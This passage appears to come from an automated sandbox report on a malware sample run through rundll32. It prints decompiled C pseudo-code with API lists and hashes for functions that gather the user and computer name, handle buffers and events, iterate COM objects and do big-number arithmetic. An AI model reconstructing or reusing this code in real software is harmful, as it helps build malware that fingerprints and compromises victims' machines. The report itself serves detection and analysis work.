                                          							 *_t104 =  *_t104 & 0x00000000;
                                          							_t26 = _t105 + 0x10; // 0x3d04bfc0
                                          							E04BF4C9A( *_t26, _t96, _a8, _a24, _t104);
                                          						}
                                          						E04BF147E(_t104);
                                          						_t102 = _a16;
                                          					}
                                          					E04BF147E(_a24);
                                          					goto L14;
                                          				}
                                          				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                          					goto L29;
                                          				} else {
                                          					memcpy( &_v284, _a8, _t102);
                                          					__imp__(_t106 + _t102 - 0x117,  *0x4bfd33c);
                                          					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
                                          					_t96 = 0x80000003;
                                          					goto L6;
                                          				}
                                          			}
























                                          APIs
                                          • StrChrA.SHLWAPI(04BF553C,0000005F,00000000,00000000,00000104), ref: 04BFA675
                                          • memcpy.NTDLL(?,04BF553C,?), ref: 04BFA68E
                                          • lstrcpy.KERNEL32(?), ref: 04BFA6A4
                                            • Part of subcall function 04BFA5E9: lstrlen.KERNEL32(?,00000000,04BFD330,00000001,04BF937A,04BFD00C,04BFD00C,00000000,00000005,00000000,00000000,?,?,?,04BF207E,?), ref: 04BFA5F2
                                            • Part of subcall function 04BFA5E9: mbstowcs.NTDLL ref: 04BFA619
                                            • Part of subcall function 04BFA5E9: memset.NTDLL ref: 04BFA62B
                                            • Part of subcall function 04BF1BC1: lstrlenW.KERNEL32(04BF553C,?,?,04BFA818,3D04BFC0,80000002,04BF553C,04BF9642,74666F53,4D4C4B48,04BF9642,?,3D04BFC0,80000002,04BF553C,?), ref: 04BF1BE1
                                            • Part of subcall function 04BF147E: HeapFree.KERNEL32(00000000,00000000,04BF1D11,00000000,?,?,-00000008), ref: 04BF148A
                                          • lstrcpy.KERNEL32(?,00000000), ref: 04BFA6C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                          • String ID: \
                                          • API String ID: 2598994505-2967466578
                                          • Opcode ID: 32258dc3fa7071f6b0a7507d1ffbac355b2c169906c8dfe9e6dd1e885a9c349e
                                          • Instruction ID: 7493a4ad0a867ba1f4d8da25b447d2f25cc6b6ef02fddd3a51e556371194383f
                                          • Opcode Fuzzy Hash: 32258dc3fa7071f6b0a7507d1ffbac355b2c169906c8dfe9e6dd1e885a9c349e
                                          • Instruction Fuzzy Hash: 05510B7250020AEFDF15AFA4DD44D9A7BB9FB08314F008595FB1D97160E739ED299B20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04BF614A() {
                                          				long _v8;
                                          				long _v12;
                                          				int _v16;
                                          				long _t39;
                                          				long _t43;
                                          				signed int _t47;
                                          				short _t51;
                                          				signed int _t52;
                                          				int _t56;
                                          				int _t57;
                                          				char* _t64;
                                          				short* _t67;
                                          
                                          				_v16 = 0;
                                          				_v8 = 0;
                                          				GetUserNameW(0,  &_v8);
                                          				_t39 = _v8;
                                          				if(_t39 != 0) {
                                          					_v12 = _t39;
                                          					_v8 = 0;
                                          					GetComputerNameW(0,  &_v8);
                                          					_t43 = _v8;
                                          					if(_t43 != 0) {
                                          						_v12 = _v12 + _t43 + 2;
                                          						_t64 = E04BF58BE(_v12 + _t43 + 2 << 2);
                                          						if(_t64 != 0) {
                                          							_t47 = _v12;
                                          							_t67 = _t64 + _t47 * 2;
                                          							_v8 = _t47;
                                          							if(GetUserNameW(_t67,  &_v8) == 0) {
                                          								L7:
                                          								E04BF147E(_t64);
                                          							} else {
                                          								_t51 = 0x40;
                                          								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                          								_t52 = _v8;
                                          								_v12 = _v12 - _t52;
                                          								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                          									goto L7;
                                          								} else {
                                          									_t56 = _v12 + _v8;
                                          									_t31 = _t56 + 2; // 0x4bf5210
                                          									_v12 = _t56;
                                          									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                          									_v8 = _t57;
                                          									if(_t57 == 0) {
                                          										goto L7;
                                          									} else {
                                          										_t64[_t57] = 0;
                                          										_v16 = _t64;
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v16;
                                          			}
















                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,04BF520E), ref: 04BF615E
                                          • GetComputerNameW.KERNEL32(00000000,04BF520E), ref: 04BF617A
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                          • GetUserNameW.ADVAPI32(00000000,04BF520E), ref: 04BF61B4
                                          • GetComputerNameW.KERNEL32(04BF520E,?), ref: 04BF61D7
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04BF520E,00000000,04BF5210,00000000,00000000,?,?,04BF520E), ref: 04BF61FA
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                          • String ID:
                                          • API String ID: 3850880919-0
                                          • Opcode ID: 31a3fe02d55467cf10c1ad05fc520029f458fcca8a178b9d7196b3b0e3a67010
                                          • Instruction ID: d5a9ffb4eb5f4fcf572416911ba1e0dd531ea04a11c357898c12fe9dd92e0eef
                                          • Opcode Fuzzy Hash: 31a3fe02d55467cf10c1ad05fc520029f458fcca8a178b9d7196b3b0e3a67010
                                          • Instruction Fuzzy Hash: BF21B9B6940108FFDB11DFE9D984DEEBBBDEF44304B5044AAEA05E7201E634AB45DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E04BF62CD(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
                                          				char _v5;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				char _t28;
                                          				void* _t36;
                                          				void* _t41;
                                          				char* _t42;
                                          				void* _t44;
                                          				void* _t49;
                                          				void* _t50;
                                          				int _t51;
                                          				int _t54;
                                          				void* _t55;
                                          
                                          				_t49 = _a4;
                                          				_t55 = __eax;
                                          				_v12 = 0xb;
                                          				if(_t49 != 0 && __eax != 0) {
                                          					_t5 = _t55 - 1; // -1
                                          					_t42 = _t49 + _t5;
                                          					_t28 =  *_t42;
                                          					_v5 = _t28;
                                          					 *_t42 = 0;
                                          					__imp__(_a8, _t41);
                                          					_v16 = _t28;
                                          					_t50 =  *0x4bfd114(_t49, _a8);
                                          					if(_t50 != 0) {
                                          						 *_t42 = _v5;
                                          						_t44 = RtlAllocateHeap( *0x4bfd238, 0, _a16 + __eax);
                                          						if(_t44 == 0) {
                                          							_v12 = 8;
                                          						} else {
                                          							_t51 = _t50 - _a4;
                                          							memcpy(_t44, _a4, _t51);
                                          							_t36 = memcpy(_t44 + _t51, _a12, _a16);
                                          							_t45 = _v16;
                                          							_t54 = _a16;
                                          							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
                                          							 *_a20 = _t44;
                                          							_v12 = _v12 & 0x00000000;
                                          							 *_a24 = _t55 - _v16 + _t54;
                                          						}
                                          					}
                                          				}
                                          				return _v12;
                                          			}

















                                          APIs
                                          • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 04BF6301
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BF632D
                                          • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 04BF6341
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 04BF6350
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 04BF636B
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 62cc9f0df4ef51a79f759903d4318df565a89b021acd8c031f785933e59b73b4
                                          • Instruction ID: 5e246341d6fd1cc58839bc1c7b3a38057f733b56933c7da6984cdbda52cdbe93
                                          • Opcode Fuzzy Hash: 62cc9f0df4ef51a79f759903d4318df565a89b021acd8c031f785933e59b73b4
                                          • Instruction Fuzzy Hash: 02214C76A00209AFDB019FACCC44A9EBF79EF95304F058195ED48AB304D735E91ACBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E04BF9FE7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                          				void* __esi;
                                          				long _t10;
                                          				void* _t18;
                                          				void* _t22;
                                          
                                          				_t9 = __eax;
                                          				_t22 = __eax;
                                          				if(_a4 != 0 && E04BF6B6E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                          					L9:
                                          					return GetLastError();
                                          				}
                                          				_t10 = E04BFA96C(_t9, _t18, _t22, _a8);
                                          				if(_t10 == 0) {
                                          					ResetEvent( *(_t22 + 0x1c));
                                          					ResetEvent( *(_t22 + 0x20));
                                          					_push(0);
                                          					_push(0);
                                          					_push(0xffffffff);
                                          					_push(0);
                                          					_push( *((intOrPtr*)(_t22 + 0x18)));
                                          					if( *0x4bfd12c() != 0) {
                                          						SetEvent( *(_t22 + 0x1c));
                                          						goto L7;
                                          					} else {
                                          						_t10 = GetLastError();
                                          						if(_t10 == 0x3e5) {
                                          							L7:
                                          							_t10 = 0;
                                          						}
                                          					}
                                          				}
                                          				if(_t10 == 0xffffffff) {
                                          					goto L9;
                                          				}
                                          				return _t10;
                                          			}








                                          APIs
                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04BF66AF,?,?,00000000,00000000), ref: 04BFA021
                                          • ResetEvent.KERNEL32(?), ref: 04BFA026
                                          • GetLastError.KERNEL32 ref: 04BFA03E
                                          • GetLastError.KERNEL32(?,?,00000102,04BF66AF,?,?,00000000,00000000), ref: 04BFA059
                                            • Part of subcall function 04BF6B6E: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,04BFA006,?,?,?,?,00000102,04BF66AF,?,?,00000000), ref: 04BF6B7A
                                            • Part of subcall function 04BF6B6E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04BFA006,?,?,?,?,00000102,04BF66AF,?), ref: 04BF6BD8
                                            • Part of subcall function 04BF6B6E: lstrcpy.KERNEL32(00000000,00000000), ref: 04BF6BE8
                                          • SetEvent.KERNEL32(?), ref: 04BFA04C
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1449191863-0
                                          • Opcode ID: 52e5cc968eb8547e707bc7e598d2accb15918578561bafaee014562b02b462cb
                                          • Instruction ID: ddec6bcc3f5dd5b79bc6138b604ac26073b228607df5f4cbe78fa962a3a04621
                                          • Opcode Fuzzy Hash: 52e5cc968eb8547e707bc7e598d2accb15918578561bafaee014562b02b462cb
                                          • Instruction Fuzzy Hash: 2F014B31100201AEDB306A75EC44F5BBBA9FF48764F108A65FB5D920E0D725F81E9A61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04BF6A7F(intOrPtr _a4) {
                                          				void* _t2;
                                          				unsigned int _t4;
                                          				void* _t5;
                                          				long _t6;
                                          				void* _t7;
                                          				void* _t15;
                                          
                                          				_t2 = CreateEventA(0, 1, 0, 0);
                                          				 *0x4bfd26c = _t2;
                                          				if(_t2 == 0) {
                                          					return GetLastError();
                                          				}
                                          				_t4 = GetVersion();
                                          				if(_t4 != 5) {
                                          					L4:
                                          					if(_t15 <= 0) {
                                          						_t5 = 0x32;
                                          						return _t5;
                                          					}
                                          					L5:
                                          					 *0x4bfd25c = _t4;
                                          					_t6 = GetCurrentProcessId();
                                          					 *0x4bfd258 = _t6;
                                          					 *0x4bfd264 = _a4;
                                          					_t7 = OpenProcess(0x10047a, 0, _t6);
                                          					 *0x4bfd254 = _t7;
                                          					if(_t7 == 0) {
                                          						 *0x4bfd254 =  *0x4bfd254 | 0xffffffff;
                                          					}
                                          					return 0;
                                          				}
                                          				if(_t4 >> 8 > 0) {
                                          					goto L5;
                                          				}
                                          				_t15 = _t4 - _t4;
                                          				goto L4;
                                          			}










                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04BF90D2,?), ref: 04BF6A87
                                          • GetVersion.KERNEL32 ref: 04BF6A96
                                          • GetCurrentProcessId.KERNEL32 ref: 04BF6AB2
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04BF6ACF
                                          • GetLastError.KERNEL32 ref: 04BF6AEE
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                          • String ID:
                                          • API String ID: 2270775618-0
                                          • Opcode ID: 48b04c7d580e82141e2492df24ff4729f23f8e8a5f9191467e91f38eb42a7656
                                          • Instruction ID: ca84ca1241cc435545969f4bbdfc007d3ac2e832e4dc581c151d4ce27705c7a9
                                          • Opcode Fuzzy Hash: 48b04c7d580e82141e2492df24ff4729f23f8e8a5f9191467e91f38eb42a7656
                                          • Instruction Fuzzy Hash: 94F01970640306ABEB208BB5AC19B157B65E744741F10855BEE4FC71C0E6B8E89BCB75
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 46%
                                          			E04BF91B5(intOrPtr* __eax) {
                                          				void* _v8;
                                          				WCHAR* _v12;
                                          				void* _v16;
                                          				char _v20;
                                          				void* _v24;
                                          				intOrPtr _v28;
                                          				void* _v32;
                                          				intOrPtr _v40;
                                          				short _v48;
                                          				intOrPtr _v56;
                                          				short _v64;
                                          				intOrPtr* _t54;
                                          				intOrPtr* _t56;
                                          				intOrPtr _t57;
                                          				intOrPtr* _t58;
                                          				intOrPtr* _t60;
                                          				void* _t61;
                                          				intOrPtr* _t63;
                                          				intOrPtr* _t65;
                                          				short _t67;
                                          				intOrPtr* _t68;
                                          				intOrPtr* _t70;
                                          				intOrPtr* _t72;
                                          				intOrPtr* _t75;
                                          				intOrPtr* _t77;
                                          				intOrPtr _t79;
                                          				intOrPtr* _t83;
                                          				intOrPtr* _t87;
                                          				intOrPtr _t103;
                                          				intOrPtr _t109;
                                          				void* _t118;
                                          				void* _t122;
                                          				void* _t123;
                                          				intOrPtr _t130;
                                          
                                          				_t123 = _t122 - 0x3c;
                                          				_push( &_v8);
                                          				_push(__eax);
                                          				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                          				if(_t118 >= 0) {
                                          					_t54 = _v8;
                                          					_t103 =  *0x4bfd2a4; // 0x24da5a8
                                          					_t5 = _t103 + 0x4bfe038; // 0x3050f485
                                          					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                          					_t56 = _v8;
                                          					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                          					if(_t118 >= 0) {
                                          						__imp__#2(0x4bfc298);
                                          						_v28 = _t57;
                                          						if(_t57 == 0) {
                                          							_t118 = 0x8007000e;
                                          						} else {
                                          							_t60 = _v32;
                                          							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                          							_t87 = __imp__#6;
                                          							_t118 = _t61;
                                          							if(_t118 >= 0) {
                                          								_t63 = _v24;
                                          								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                          								if(_t118 >= 0) {
                                          									_t130 = _v20;
                                          									if(_t130 != 0) {
                                          										_t67 = 3;
                                          										_v64 = _t67;
                                          										_v48 = _t67;
                                          										_v56 = 0;
                                          										_v40 = 0;
                                          										if(_t130 > 0) {
                                          											while(1) {
                                          												_t68 = _v24;
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												_t123 = _t123;
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                          												if(_t118 < 0) {
                                          													goto L16;
                                          												}
                                          												_t70 = _v8;
                                          												_t109 =  *0x4bfd2a4; // 0x24da5a8
                                          												_t28 = _t109 + 0x4bfe0bc; // 0x3050f1ff
                                          												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                          												if(_t118 >= 0) {
                                          													_t75 = _v16;
                                          													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                          													if(_t118 >= 0 && _v12 != 0) {
                                          														_t79 =  *0x4bfd2a4; // 0x24da5a8
                                          														_t33 = _t79 + 0x4bfe078; // 0x76006f
                                          														if(lstrcmpW(_v12, _t33) == 0) {
                                          															_t83 = _v16;
                                          															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                          														}
                                          														 *_t87(_v12);
                                          													}
                                          													_t77 = _v16;
                                          													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                          												}
                                          												_t72 = _v8;
                                          												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                          												_v40 = _v40 + 1;
                                          												if(_v40 < _v20) {
                                          													continue;
                                          												}
                                          												goto L16;
                                          											}
                                          										}
                                          									}
                                          								}
                                          								L16:
                                          								_t65 = _v24;
                                          								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                          							}
                                          							 *_t87(_v28);
                                          						}
                                          						_t58 = _v32;
                                          						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                          					}
                                          				}
                                          				return _t118;
                                          			}

                                          APIs
                                          • SysAllocString.OLEAUT32(04BFC298), ref: 04BF9205
                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04BF92E6
                                          • SysFreeString.OLEAUT32(00000000), ref: 04BF92FF
                                          • SysFreeString.OLEAUT32(?), ref: 04BF932E
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloclstrcmp
                                          • String ID:
                                          • API String ID: 1885612795-0
                                          • Opcode ID: 8cd1f9bbd521b414f9f8fd665c54d23fd0d1242d5a84db5d6c5eea142b967e47
                                          • Instruction ID: 0308e552a9c977b4d04a625c002107e7f0c8266cc1f40bd07a890ac21ccbdc1c
                                          • Opcode Fuzzy Hash: 8cd1f9bbd521b414f9f8fd665c54d23fd0d1242d5a84db5d6c5eea142b967e47
                                          • Instruction Fuzzy Hash: 0C513EB5D00519EFCB00DFE8C888DAEB7B9FF89704B144595E919EB260D731AD46CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 85%
                                          			E04BF7664(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				void _v92;
                                          				void _v236;
                                          				void* _t55;
                                          				unsigned int _t56;
                                          				signed int _t66;
                                          				signed int _t74;
                                          				void* _t76;
                                          				signed int _t79;
                                          				void* _t81;
                                          				void* _t92;
                                          				void* _t96;
                                          				signed int* _t99;
                                          				signed int _t101;
                                          				signed int _t103;
                                          				void* _t107;
                                          
                                          				_t92 = _a12;
                                          				_t101 = __eax;
                                          				_t55 = E04BF48F0(_a16, _t92);
                                          				_t79 = _t55;
                                          				if(_t79 == 0) {
                                          					L18:
                                          					return _t55;
                                          				}
                                          				_t56 =  *(_t92 + _t79 * 4 - 4);
                                          				_t81 = 0;
                                          				_t96 = 0x20;
                                          				if(_t56 == 0) {
                                          					L4:
                                          					_t97 = _t96 - _t81;
                                          					_v12 = _t96 - _t81;
                                          					E04BF748A(_t79,  &_v236);
                                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04BF7074(_t101,  &_v236, _a8, _t96 - _t81);
                                          					E04BF7074(_t79,  &_v92, _a12, _t97);
                                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                          					_t66 = E04BF748A(_t101, 0x4bfd1b0);
                                          					_t103 = _t101 - _t79;
                                          					_a8 = _t103;
                                          					if(_t103 < 0) {
                                          						L17:
                                          						E04BF748A(_a16, _a4);
                                          						E04BF2FED(_t79,  &_v236, _a4, _t97);
                                          						memset( &_v236, 0, 0x8c);
                                          						_t55 = memset( &_v92, 0, 0x44);
                                          						goto L18;
                                          					}
                                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                          					do {
                                          						if(_v8 != 0xffffffff) {
                                          							_push(1);
                                          							_push(0);
                                          							_push(0);
                                          							_push( *_t99);
                                          							L04BFB088();
                                          							_t74 = _t66 +  *(_t99 - 4);
                                          							asm("adc edx, esi");
                                          							_push(0);
                                          							_push(_v8 + 1);
                                          							_push(_t92);
                                          							_push(_t74);
                                          							L04BFB082();
                                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                                          								_t74 = _t74 | 0xffffffff;
                                          								_v16 = _v16 & 0x00000000;
                                          							}
                                          						} else {
                                          							_t74 =  *_t99;
                                          						}
                                          						_t106 = _t107 + _a8 * 4 - 0xe8;
                                          						_a12 = _t74;
                                          						_t76 = E04BF6FDC(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                          						while(1) {
                                          							 *_t99 =  *_t99 - _t76;
                                          							if( *_t99 != 0) {
                                          								goto L14;
                                          							}
                                          							L13:
                                          							_t92 =  &_v92;
                                          							if(E04BF15CE(_t79, _t92, _t106) < 0) {
                                          								break;
                                          							}
                                          							L14:
                                          							_a12 = _a12 + 1;
                                          							_t76 = E04BF687D(_t79,  &_v92, _t106, _t106);
                                          							 *_t99 =  *_t99 - _t76;
                                          							if( *_t99 != 0) {
                                          								goto L14;
                                          							}
                                          							goto L13;
                                          						}
                                          						_a8 = _a8 - 1;
                                          						_t66 = _a12;
                                          						_t99 = _t99 - 4;
                                          						 *(0x4bfd1b0 + _a8 * 4) = _t66;
                                          					} while (_a8 >= 0);
                                          					_t97 = _v12;
                                          					goto L17;
                                          				}
                                          				while(_t81 < _t96) {
                                          					_t81 = _t81 + 1;
                                          					_t56 = _t56 >> 1;
                                          					if(_t56 != 0) {
                                          						continue;
                                          					}
                                          					goto L4;
                                          				}
                                          				goto L4;
                                          			}

                                          APIs
                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04BF7711
                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04BF7727
                                          • memset.NTDLL ref: 04BF77C7
                                          • memset.NTDLL ref: 04BF77D7
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: memset$_allmul_aulldiv
                                          • String ID:
                                          • API String ID: 3041852380-0
                                          • Opcode ID: f49b83cfd98b76836efca14f09a175f0951f3a4227b02126f6822a15d1fd0f70
                                          • Instruction ID: 9f05467183613796c739cc2d1373207707c6f0158b5e7010746fe768951e0ed2
                                          • Opcode Fuzzy Hash: f49b83cfd98b76836efca14f09a175f0951f3a4227b02126f6822a15d1fd0f70
                                          • Instruction Fuzzy Hash: 42416431600259ABDB10EFA8DC40FDE7775EF44714F1085E9FA1EA7180EB71BA598B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?,00000008,75144D40), ref: 04BFA97E
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                          • ResetEvent.KERNEL32(?), ref: 04BFA9F2
                                          • GetLastError.KERNEL32 ref: 04BFAA15
                                          • GetLastError.KERNEL32 ref: 04BFAAC0
                                            • Part of subcall function 04BF147E: HeapFree.KERNEL32(00000000,00000000,04BF1D11,00000000,?,?,-00000008), ref: 04BF148A
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                          • String ID:
                                          • API String ID: 943265810-0
                                          • Opcode ID: 5ce8fad2bb5a0630450a7b4b9292dd3ba3abc354043042355def9c92a7ba2469
                                          • Instruction ID: 8c74fd7c6c3582beceab69d736d8a02178f3c531862a889072a477556d44bdab
                                          • Opcode Fuzzy Hash: 5ce8fad2bb5a0630450a7b4b9292dd3ba3abc354043042355def9c92a7ba2469
                                          • Instruction Fuzzy Hash: E6418E71500204BFE7319FA5CD48E5B7BBDEB89700B14496AF64FD20A0D735EA59DA30
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 39%
                                          			E04BF8F08(void* __eax) {
                                          				char _v8;
                                          				void* _v12;
                                          				intOrPtr _v16;
                                          				char _v20;
                                          				void* __esi;
                                          				intOrPtr _t36;
                                          				intOrPtr* _t37;
                                          				intOrPtr* _t39;
                                          				void* _t53;
                                          				long _t58;
                                          				void* _t59;
                                          
                                          				_t59 = __eax;
                                          				_t58 = 0;
                                          				ResetEvent( *(__eax + 0x1c));
                                          				_push( &_v8);
                                          				_push(4);
                                          				_push( &_v20);
                                          				_push( *((intOrPtr*)(_t59 + 0x18)));
                                          				if( *0x4bfd138() != 0) {
                                          					L5:
                                          					if(_v8 == 0) {
                                          						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                                          						L21:
                                          						return _t58;
                                          					}
                                          					 *0x4bfd168(0, 1,  &_v12);
                                          					if(0 != 0) {
                                          						_t58 = 8;
